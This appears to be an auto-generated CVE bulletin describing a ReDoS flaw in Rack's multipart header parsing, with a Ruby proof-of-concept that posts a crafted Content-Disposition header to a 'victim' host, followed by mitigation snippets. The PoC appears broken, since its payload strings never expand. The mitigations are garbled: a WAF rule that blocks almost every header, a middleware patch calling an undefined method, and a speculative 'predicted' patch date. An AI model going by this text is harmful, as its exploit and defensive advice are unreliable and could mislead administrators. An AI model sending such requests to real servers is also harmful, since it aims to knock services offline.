Listen to this Post
How the CVE Works
The vulnerability exists in Rack’s `multipart.rb` component, specifically in the `handle_mime_head` method which processes Content-Disposition headers. A malicious actor can craft a multipart request with a specially formatted header containing exponential backtracking regex patterns. When Rack attempts to parse this using its regex-based header matcher, it triggers catastrophic backtracking, consuming excessive CPU resources. This ReDoS (Regular Expression Denial of Service) attack stalls the server thread, leading to application unavailability. The issue stems from insufficient regex sanitization in header parsing, similar to CVE-2022-44571 but with different attack vectors.
DailyCVE Form
Platform: Ruby on Rails (Rack)
Version: <3.0.0, >2.2.0
Vulnerability: ReDoS
Severity: Critical
Date: 2025-06-05
Prediction: Patch by 2025-06-20
What Undercode Say:
Analytics:
- Affects all Rails apps processing file uploads
- Exploit requires only 1 malicious request
- CPU spikes to 100% during attack
Exploit (PoC):
require 'net/http'
malicious_header = "Content-Disposition: form-data; name=\"{'a' 1000}!\"; filename0=utf-8''{'x' 5000}"
uri = URI('http://victim/target')
http = Net::HTTP.new(uri.host, uri.port)
request = Net::HTTP::Post.new(uri)
request['Content-Type'] = 'multipart/form-data'
request.body = malicious_header
http.request(request)
Protection:
1. Immediate mitigation:
gem install rack --version '>=3.0.0'
2. Nginx rate limiting:
limit_req_zone $binary_remote_addr zone=rackdos:10m rate=5r/s;
3. Rack middleware patch:
Rack::Multipart::Parser.class_eval do
def handle_mime_head
Add regex timeout logic here
Timeout.timeout(0.5) { original_handle_mime_head }
end
end
4. WAF rule:
SecRule REQUEST_HEADERS:Content-Disposition "@rx .{2,}" \
"id:1005,phase:1,deny,status:400"
5. Monitoring command:
watch -n 1 "grep 'Rack::Multipart' /var/log/rails/production.log | tail -20"
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
